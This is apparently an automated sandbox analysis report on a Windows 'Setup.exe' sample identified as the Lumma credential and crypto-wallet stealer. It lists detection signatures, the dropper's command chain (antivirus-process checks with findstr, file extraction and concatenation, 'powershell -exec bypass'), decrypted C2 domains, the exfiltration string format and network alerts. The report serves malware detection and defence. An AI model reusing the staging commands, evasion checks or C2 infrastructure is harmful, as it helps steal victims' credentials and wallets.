Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1579539
MD5: 7a2ed58357c7dc7a63754e88af43a860
SHA1: 632930cbe696ee75e3445835258c77e8d27ab426
SHA256: 984d3e2de76f512c364247b280180d5bd7ed45b4d0c483e10a041943e08730d4
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Setup.exe (PID: 4564 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 7A2ED58357C7DC7A63754E88AF43A860)
    • cmd.exe (PID: 6800 cmdline: "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6688 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5364 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2296 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3060 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6204 cmdline: cmd /c md 124531 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 5148 cmdline: extrac32 /Y /E Lt MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2836 cmdline: findstr /V "Heater" Lance MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1476 cmdline: cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Designing.com (PID: 6380 cmdline: Designing.com z MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 4676 cmdline: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: 
center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f638cc2ab095e5f</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- 
/#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 5508 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "necklacebudi.lat", "quantitypitt.click", "grannyejh.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "hRjzG3--VIKA"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000C.00000003.2535381458.000000000419E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Designing.com PID: 6380 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Designing.com PID: 6380 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Source: Process started, Author: Nikita Nazarov, oscd.community, Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix), Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
Source: Process started, Author: frack113, Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6800, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3060, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T23:28:44.992703+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49760 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:46.999528+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49766 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:49.412750+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49775 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:51.931764+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49782 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:54.195683+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49788 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:56.669995+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49794 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:58.952601+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49799 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:01.468180+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49805 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:05.112090+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49816 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:11.147526+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49823 | 194.58.112.174 | 443 | TCP
2024-12-22T23:29:17.590806+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49846 | 172.67.191.144 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T23:28:45.767273+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49760 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:47.780519+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49766 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:05.877554+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49816 | 172.67.186.189 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T23:28:45.767273+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49760 | 172.67.186.189 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T23:28:47.780519+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49766 | 172.67.186.189 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T23:28:50.654793+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49775 | 172.67.186.189 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T23:29:01.474167+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.5 | 49805 | 172.67.186.189 | 443 | TCP

AV Detection

Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "necklacebudi.lat", "quantitypitt.click", "grannyejh.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "hRjzG3--VIKA"}
Source: Setup.exe, Virustotal: Detection: 7%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 94.3% probability
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: rapeflowwj.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: crosshuaht.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: sustainskelet.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: aspecteirs.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: energyaffai.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: necklacebudi.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: discokeyus.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: grannyejh.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: quantitypitt.click
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: - Screen Resoluton:
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: - Physical Installed Memory:
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: Workgroup: -
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, String decryptor: hRjzG3--VIKA
Source: Setup.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.191.144:443 -> 192.168.2.5:49846 version: TLS 1.2
Source: Setup.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Setup.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\Setup.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E0DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00E0DC54
